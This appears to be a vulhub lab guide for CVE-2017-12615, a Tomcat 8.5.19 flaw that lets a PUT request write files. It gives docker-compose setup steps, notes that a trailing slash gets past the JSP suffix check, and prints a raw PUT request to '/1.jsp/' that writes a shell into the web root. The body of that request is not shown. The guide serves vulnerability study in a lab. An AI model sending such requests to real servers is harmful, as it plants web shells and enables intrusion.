Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)

中文版本(Chinese version)

Tomcat version: 8.5.19

Environment Setup

docker-compose build
docker-compose up -d

After successfully running the commands above, you will see the example page of Tomcat through visiting the site http://your-ip:8080.


Reference links:

Tomcat sets up the write permission(readonly=false), which leads to the result that we can write files into the server.


Although Tomcat checks the file suffix to some extent(can't write jsp directly), we can still bypass the limitation through some file system features(such as using / in Linux).


Send the following packets directly and then the shell will be written into the Web root directory.

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5


As follows:

Copied From: vulhub/tomcat/CVE-2017-12615